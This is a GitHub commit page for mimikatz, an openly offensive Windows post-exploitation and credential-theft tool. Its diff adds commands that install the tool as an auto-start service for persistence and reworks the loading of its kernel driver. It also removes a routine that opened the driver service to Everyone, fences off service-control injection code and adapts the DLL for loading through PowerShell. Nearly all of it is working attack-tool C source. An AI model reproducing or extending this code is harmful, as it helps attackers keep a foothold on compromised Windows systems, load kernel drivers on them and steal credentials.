Skip to content

Commit

Permalink
One PowerShell fix and better service/token functions
Browse files Browse the repository at this point in the history 
[fix gentilkiwi#83] mimikatz - No ExitProcess when using DLL (for PowerShell)
[new] mimikatz - service::+ & service::- to install/uninstall
[enhancement] token::elevate & token::run
  • Loading branch information
@gentilkiwi
gentilkiwi committed Mar 26, 2017
1 parent 1722002 commit b0be118
Show file tree
Hide file tree
Showing 14 changed files with 261 additions and 139 deletions.
1 change: 1 addition & 0 deletions inc/globals.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@
#include <wchar.h>
#include "../modules/kull_m_output.h"
//#define KERBEROS_TOOLS
//#define SERVICE_INCONTROL
//#define LSASS_DECRYPT
#define NET_MODULE
#define SQLITE3_OMIT
Expand Down
7 changes: 6 additions & 1 deletion mimikatz/mimikatz.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -86,7 +86,9 @@ void mimikatz_end()
SetConsoleCtrlHandler(HandlerRoutine, FALSE);
#endif
kull_m_output_clean();
#ifndef _WINDLL
ExitProcess(STATUS_SUCCESS);
#endif
}

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
Expand All @@ -110,7 +112,10 @@ NTSTATUS mimikatz_initOrClean(BOOL Init)
offsetToFunc = FIELD_OFFSET(KUHL_M, pInit);
hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
if(FAILED(hr))
PRINT_ERROR(L"CoInitializeEx: %08x\n", hr);
#ifdef _WINDLL
if(hr != RPC_E_CHANGED_MODE)
#endif
PRINT_ERROR(L"CoInitializeEx: %08x\n", hr);
kull_m_asn1_init();
}
else
Expand Down
109 changes: 8 additions & 101 deletions mimikatz/modules/kuhl_m_kernel.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -55,114 +55,21 @@ NTSTATUS kuhl_m_kernel_do(wchar_t * input)

NTSTATUS kuhl_m_kernel_add_mimidrv(int argc, wchar_t * argv[])
{
wchar_t *absFile, file[] = MIMIKATZ_DRIVER L".sys";
SC_HANDLE hSC = NULL, hS = NULL;


if(hSC = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE))
wchar_t *absFile;
if(kull_m_file_getAbsolutePathOf(MIMIKATZ_DRIVER L".sys", &absFile))
{
if(hS = OpenService(hSC, MIMIKATZ_DRIVER, SERVICE_START))
{
kprintf(L"[+] mimikatz driver already registered\n");
}
else
{
if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST)
{
kprintf(L"[*] mimikatz driver not present\n");
if(kull_m_file_getAbsolutePathOf(file, &absFile))
{
if(kull_m_file_isFileExist(absFile))
{
if(hS = CreateService(hSC, MIMIKATZ_DRIVER, L"mimikatz driver (" MIMIKATZ_DRIVER L")", READ_CONTROL | WRITE_DAC | SERVICE_START, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, absFile, NULL, NULL, NULL, NULL, NULL))
{
kprintf(L"[+] mimikatz driver successfully registered\n");

if(kuhl_m_kernel_addWorldToMimikatz(hS))
kprintf(L"[+] mimikatz driver ACL to everyone\n");
else PRINT_ERROR_AUTO(L"kuhl_m_kernel_addWorldToMimikatz");
}
else PRINT_ERROR_AUTO(L"CreateService");
}
else PRINT_ERROR_AUTO(L"kull_m_file_isFileExist");

LocalFree(absFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_getAbsolutePathOf");
}
else PRINT_ERROR_AUTO(L"OpenService");
}
if(hS)
{
if(StartService(hS, 0, NULL))
kprintf(L"[+] mimikatz driver started\n");
else if(GetLastError() == ERROR_SERVICE_ALREADY_RUNNING)
kprintf(L"[*] mimikatz driver already started\n");
else
PRINT_ERROR_AUTO(L"StartService");
CloseServiceHandle(hS);
}
CloseServiceHandle(hSC);
if(kull_m_file_isFileExist(absFile))
kull_m_service_install(MIMIKATZ_DRIVER, MIMIKATZ L" driver (" MIMIKATZ_DRIVER L")", absFile, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);
else PRINT_ERROR_AUTO(L"kull_m_file_isFileExist");
LocalFree(absFile);
}
else PRINT_ERROR_AUTO(L"OpenSCManager(create)");
else PRINT_ERROR_AUTO(L"kull_m_file_getAbsolutePathOf");
return STATUS_SUCCESS;
}

BOOL kuhl_m_kernel_addWorldToMimikatz(SC_HANDLE monHandle)
{
BOOL status = FALSE;
DWORD dwSizeNeeded;
PSECURITY_DESCRIPTOR oldSd, newSd;
SECURITY_DESCRIPTOR dummySdForXP;
SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY;
EXPLICIT_ACCESS ForEveryOne = {
SERVICE_QUERY_STATUS | SERVICE_QUERY_CONFIG | SERVICE_INTERROGATE | SERVICE_ENUMERATE_DEPENDENTS | SERVICE_PAUSE_CONTINUE | SERVICE_START | SERVICE_STOP | SERVICE_USER_DEFINED_CONTROL | READ_CONTROL,
SET_ACCESS,
NO_INHERITANCE,
{NULL, NO_MULTIPLE_TRUSTEE, TRUSTEE_IS_SID, TRUSTEE_IS_WELL_KNOWN_GROUP, NULL}
};
if(!QueryServiceObjectSecurity(monHandle, DACL_SECURITY_INFORMATION, &dummySdForXP, 0, &dwSizeNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
{
if(oldSd = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR, dwSizeNeeded))
{
if(QueryServiceObjectSecurity(monHandle, DACL_SECURITY_INFORMATION, oldSd, dwSizeNeeded, &dwSizeNeeded))
{
if(AllocateAndInitializeSid(&SIDAuthWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, (PSID *)&ForEveryOne.Trustee.ptstrName))
{
if(BuildSecurityDescriptor(NULL, NULL, 1, &ForEveryOne, 0, NULL, oldSd, &dwSizeNeeded, &newSd) == ERROR_SUCCESS)
{
status = SetServiceObjectSecurity(monHandle, DACL_SECURITY_INFORMATION, newSd);
LocalFree(newSd);
}
FreeSid(ForEveryOne.Trustee.ptstrName);
}
}
LocalFree(oldSd);
}
}
return status;
}

NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[])
{
BOOL toRemove = TRUE;
if(kull_m_service_stop(MIMIKATZ_DRIVER))
kprintf(L"[+] mimikatz driver stopped\n");
else if(GetLastError() == ERROR_SERVICE_NOT_ACTIVE)
kprintf(L"[*] mimikatz driver not running\n");
else
{
toRemove = FALSE;
PRINT_ERROR_AUTO(L"kull_m_service_stop");
}

if(toRemove)
{
if(kull_m_service_remove(MIMIKATZ_DRIVER))
kprintf(L"[+] mimikatz driver removed\n");
else
PRINT_ERROR_AUTO(L"kull_m_service_remove");
}
kull_m_service_uninstall(MIMIKATZ_DRIVER);
return STATUS_SUCCESS;
}

Expand Down
3 changes: 0 additions & 3 deletions mimikatz/modules/kuhl_m_kernel.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,8 +11,6 @@
#include "../modules/kull_m_file.h"
#include "../modules/kull_m_string.h"
#include "kuhl_m_sysenvvalue.h"
#include <aclapi.h>
#include <sddl.h>

typedef struct _KUHL_K_C {
const PKUHL_M_C_FUNC pCommand;
Expand All @@ -24,7 +22,6 @@ typedef struct _KUHL_K_C {
NTSTATUS kuhl_m_kernel_do(wchar_t * input);

NTSTATUS kuhl_m_kernel_add_mimidrv(int argc, wchar_t * argv[]);
BOOL kuhl_m_kernel_addWorldToMimikatz(SC_HANDLE monHandle);
NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[]);

NTSTATUS kuhl_m_kernel_processProtect(int argc, wchar_t * argv[]);
Expand Down
65 changes: 53 additions & 12 deletions mimikatz/modules/kuhl_m_service.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,8 @@ const KUHL_M_C kuhl_m_c_service[] = {
{kuhl_m_service_preshutdown,L"preshutdown", L"Preshutdown service"},
{kuhl_m_service_shutdown, L"shutdown", L"Shutdown service"},
{kuhl_m_service_list, L"list", L"List services"},
{kuhl_m_service_installme, L"+", L"Install Me!"},
{kuhl_m_service_uninstallme,L"-", L"Install Me!"},
{kuhl_m_service_me, L"me", L"Me!"},
};

Expand Down Expand Up @@ -42,7 +44,6 @@ NTSTATUS kuhl_m_c_service_clean()

NTSTATUS genericFunction(KUHL_M_SERVICE_FUNC function, wchar_t * text, int argc, wchar_t * argv[], DWORD dwControl)
{

if(argc)
{
kprintf(L"%s \'%s\' service : ", text, argv[0]);
Expand All @@ -52,11 +53,13 @@ NTSTATUS genericFunction(KUHL_M_SERVICE_FUNC function, wchar_t * text, int argc,
kprintf(L"OK\n");
else PRINT_ERROR_AUTO(L"Service operation");
}
#ifdef SERVICE_INCONTROL
else if(dwControl && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_BUILD_7))
{
kuhl_service_sendcontrol_inprocess(argv[0], dwControl);
}
else PRINT_ERROR(L"Inject not available\n");
#endif
}
else PRINT_ERROR(L"Missing service name argument\n");

Expand Down Expand Up @@ -103,6 +106,55 @@ NTSTATUS kuhl_m_service_list(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}

const wchar_t kuhl_m_service_installme_args[] = L"rpc::server service::me exit";
NTSTATUS kuhl_m_service_installme(int argc, wchar_t * argv[])
{
#pragma warning(push)
#pragma warning(disable:4996)
wchar_t *fileName = _wpgmptr;
#pragma warning(pop)
wchar_t *absFile, *buff;
DWORD size;

if(kull_m_file_getAbsolutePathOf(fileName, &absFile))
{
if(kull_m_file_isFileExist(absFile))
{
size = 1 + lstrlen(absFile) + 1 + 1 + lstrlen(kuhl_m_service_installme_args) + 1;
if(buff = (wchar_t *) LocalAlloc(LPTR, size * sizeof(wchar_t)))
{
wcscat_s(buff, size, L"\"");
wcscat_s(buff, size, absFile);
wcscat_s(buff, size, L"\" ");
wcscat_s(buff, size, kuhl_m_service_installme_args);
kull_m_service_install(MIMIKATZ_SERVICE, MIMIKATZ L" service (" MIMIKATZ_SERVICE L")", buff, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, TRUE);
LocalFree(buff);
}
}
else PRINT_ERROR_AUTO(L"kull_m_file_isFileExist");
LocalFree(absFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_getAbsolutePathOf");
return STATUS_SUCCESS;
}

NTSTATUS kuhl_m_service_uninstallme(int argc, wchar_t * argv[])
{
kull_m_service_uninstall(MIMIKATZ_SERVICE);
return STATUS_SUCCESS;
}

NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[])
{
const SERVICE_TABLE_ENTRY DispatchTable[]= {{MIMIKATZ_SERVICE, kuhl_m_service_Main}, {NULL, NULL}};
if(hKiwiEventRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
{
StartServiceCtrlDispatcher(DispatchTable);
CloseHandle(hKiwiEventRunning);
}
return STATUS_SUCCESS;
}

void WINAPI kuhl_m_service_CtrlHandler(DWORD Opcode)
{
BOOL notCoded = FALSE;
Expand Down Expand Up @@ -144,15 +196,4 @@ void WINAPI kuhl_m_service_Main(DWORD argc, LPTSTR *argv)
SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
m_ServiceStatusHandle = NULL;
}
}

NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[])
{
const SERVICE_TABLE_ENTRY DispatchTable[]= {{MIMIKATZ_SERVICE, kuhl_m_service_Main}, {NULL, NULL}};
if(hKiwiEventRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
{
StartServiceCtrlDispatcher(DispatchTable);
CloseHandle(hKiwiEventRunning);
}
return STATUS_SUCCESS;
}
3 changes: 3 additions & 0 deletions mimikatz/modules/kuhl_m_service.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,7 @@
#pragma once
#include "kuhl_m.h"
#include "../modules/kull_m_service.h"
#include "../modules/kull_m_file.h"
#include "kuhl_m_service_remote.h"

const KUHL_M kuhl_m_service;
Expand All @@ -24,6 +25,8 @@ NTSTATUS kuhl_m_service_resume(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_preshutdown(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_shutdown(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_list(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_installme(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_uninstallme(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[]);

void WINAPI kuhl_m_service_CtrlHandler(DWORD Opcode);
Expand Down
4 changes: 3 additions & 1 deletion mimikatz/modules/kuhl_m_service_remote.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,7 @@
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kuhl_m_service_remote.h"
#ifdef SERVICE_INCONTROL

PVOID pScSendControl = NULL;

Expand Down Expand Up @@ -125,4 +126,5 @@ BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
else PRINT_ERROR_AUTO(L"OpenProcess");
}
return status;
}
}
#endif
4 changes: 3 additions & 1 deletion mimikatz/modules/kuhl_m_service_remote.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,7 @@
*/
#pragma once
#include "kuhl_m_service.h"
#ifdef SERVICE_INCONTROL
#include "../modules/kull_m_remotelib.h"
#include "../modules/kull_m_patch.h"

Expand All @@ -16,4 +17,5 @@ DWORD kuhl_service_sendcontrol_std_thread_end();
DWORD WINAPI kuhl_service_sendcontrol_fast_thread(PREMOTE_LIB_DATA lpParameter);
DWORD kuhl_service_sendcontrol_fast_thread_end();

BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl);
BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl);
#endif
Loading

0 comments on commit b0be118

Please sign in to comment.